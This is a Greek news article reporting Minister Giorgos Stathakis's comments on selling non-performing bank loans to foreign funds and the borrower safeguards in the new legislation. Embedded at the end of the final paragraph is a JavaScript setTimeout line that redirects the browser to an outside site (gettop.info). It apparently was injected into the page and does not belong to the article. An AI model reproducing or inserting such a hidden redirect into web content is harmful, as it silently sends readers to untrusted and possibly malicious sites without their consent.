Σταθάκης: Δεν ξεπουλάμε τη δημόσια περιουσία

0
8

 

Ο υπουργός Οικονομίας, Ανάπτυξης και Τουρισμού, Γιώργος Σταθάκης, μιλώντας στην πρωινή ενημερωτική εκπομπή του ΑΝΤ1, έδωσε απαντήσεις σχετικά με τις δηλώσεις του Γιούνκερ, ότι, «η πώληση των κόκκινων δανείων σε ξένα funds, είναι απόφαση της ελληνικής κυβέρνησης», αλλά δεν έδωσε σαφή απάντηση δηλώνοντας ότι δεν είναι κομψό να αναφερθεί εκ των υστέρων στις θέσεις που υποστήριξαν οι δυο πλευρές στη διαπραγμάτευση.

Αναφερόμενος στην επίμαχη διαπραγμάτευση για τα «κόκκινα δάνεια», ο κ. Σταθάκης ξεκαθάρισε ότι η Κυβέρνηση επέβαλλε ένα αυστηρό ρυθμιστικό πλαίσιο που παρέχει δικλείδες ασφαλείας στους δανειολήπτες.

Κατ΄ αρχήν η τράπεζα είναι υποχρεωμένη να ενημερώσει τον δανειολήπτη 12 μήνες πριν από την πώληση του δανείου και να έρθει σε διαπραγμάτευση μαζί του. Επίσης σύμφωνα με τη νέα νομοθεσία, οι τράπεζες έχουν πλέον τη δυνατότητα να προσφέρουν τα δάνεια στους δανειολήπτες σε χαμηλότερη τιμή από το σύνολο των οφειλών τους και κυρίως η πρόταση που θα κάνουν να είναι προσαρμοσμένη στις οικονομικές δυνατότητες του δανειολήπτη.

Ο κ. Σταθάκης επανέλαβε ότι κατά τη διαπραγμάτευση η ελληνική πλευρά έβαλε τους δικούς της όρους, οι οποίοι συνιστούν ένα αυστηρό ρυθμιστικό πλαίσιο και υπενθύμισε ότι τα στεγαστικά δάνεια είναι προστατευμένα σε ποσοστό 85% έως και τις αρχές του 2018, σύμφωνα με το antenna.gr.

Παράλληλα και σχολιάζοντας τη σχετική πρόταση νόμου που θα καταθέσουν οι ΑΝΕΛ, δήλωσε ότι δεν υπάρχει περίπτωση να γίνει καμιά αλλαγή στα όσα έχουν ψηφιστεί μέχρι στιγμής και το μόνο που απομένει να νομοθετηθεί είναι η διαδικασία του εξωδικαστικού συμβιβασμού. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here